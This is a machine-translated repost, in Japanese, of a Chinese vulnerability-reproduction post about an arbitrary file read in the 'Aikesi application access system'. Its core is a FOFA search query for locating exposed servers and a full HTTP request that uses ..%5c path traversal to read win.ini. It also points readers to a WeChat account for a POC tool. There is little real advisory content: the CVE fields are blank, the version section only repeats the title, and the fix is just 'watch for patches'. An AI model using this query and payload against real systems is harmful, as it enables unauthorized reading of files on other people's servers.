Aikesi アプリケーション アクセス システムには任意のファイルを読み取る脆弱性があります

Aikesi アプリケーション アクセス システムには任意のファイルを読み取る脆弱性があります

免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。

1. Aikesi アプリケーション アクセス システムの紹介

WeChat 公式アカウント検索: 南峰脆弱性再現ライブラリ
この記事は、南峰脆弱性再現ライブラリ公式アカウントで最初に公開されました。

Aikesi アプリケーション アクセス システム (Tingzhi Technology の VA 仮想アプリケーション プラットフォーム?) は、ユーザーに仮想アシスタント (Virtual Assistant) の機能とサービスを提供するように設計された革新的なテクノロジー プラットフォームです。

2. 脆弱性の説明

Aikesi アプリケーション アクセス システム (Tingzhi Technology の VA 仮想アプリケーション プラットフォーム?) は、ユーザーに仮想アシスタント (Virtual Assistant) の機能とサービスを提供するように設計された革新的なテクノロジー プラットフォームです。仮想アシスタントは、自然言語処理、機械学習、その他の関連テクノロジーを通じて、ユーザーと対話し、さまざまなタスクやサービスを実行できる人工知能システムです。システムには任意のファイルを読み取る脆弱性があります

CVE 番号:
CNNVD 番号:
CNVD 番号:

3. バージョンに影響を与える

Aikesi アプリケーション アクセス システムには任意のファイルを読み取る脆弱性があります

4. fofaクエリステートメント

body="EAA 特典とアプリケーション アクセス システム"

5. 脆弱性の再発

脆弱性リンク: http://127.0.0.1/…%5c…%5c…%5c…%5c…%5c…%5c…%5c…%5c…%5c…%5c/windows/win.ini
脆弱性データ パッケージ:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate Connection: keep-alive

Aikesi アプリケーション アクセス システムには任意のファイルを読み取る脆弱性があります

6.POC&EXP

公式アカウント Nanfeng Vulnerability Reproduction Library をフォローし、Vulnerability Reproduction 40 と返信して POC ツールのダウンロード アドレスを取得します。

Aikesi アプリケーション アクセス システムには任意のファイルを読み取る脆弱性があります

7. 是正意見

メーカーアップデートパッチにご注意ください https://www.acleus.com/

8. 過去のレビュー

おすすめ

転載: blog.csdn.net/nnn2188185/article/details/131777496